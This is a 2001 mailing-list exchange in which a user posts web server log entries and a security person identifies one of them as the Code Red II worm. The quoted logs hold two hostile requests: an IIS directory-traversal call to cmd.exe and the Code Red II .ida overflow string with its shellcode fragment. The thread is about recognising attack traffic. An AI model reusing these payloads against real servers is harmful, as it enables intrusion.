[ale] Code Red 2
Jonathan Rickman
jonathan at xcorps.net
Tue Aug 7 17:08:35 EDT 2001
On Tue, 7 Aug 2001, Michael Smith wrote:
> Here is what I think is an attempt by the second variant of the code
> red......
>
> Am I right?
sorta...
> 24.41.74.126 - - [06/Aug/2001:13:34:22 -0400] "GET
> /scripts/..%255c..%255cwinnt/
> system32/cmd.exe?/c+ping+-n+1+-l+128+-w+1+24.41.74.126 HTTP/1.0" 404 314 "-"
> "-"
not sure what this is, but it is definately an intrusion attempt of sorts.
> 209.186.150.139 - - [06/Aug/2001:13:42:00 -0400] "GET
> /default.ida?XXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%
> u909
> 0%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8
> b00%
> u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 285 "-" "-"
> 20
This is CRII.
--
Jonathan Rickman
X Corps Security
http://www.xcorps.net
--
To unsubscribe: mail majordomo at ale.org with "unsubscribe ale" in message body.
More information about the Ale
mailing list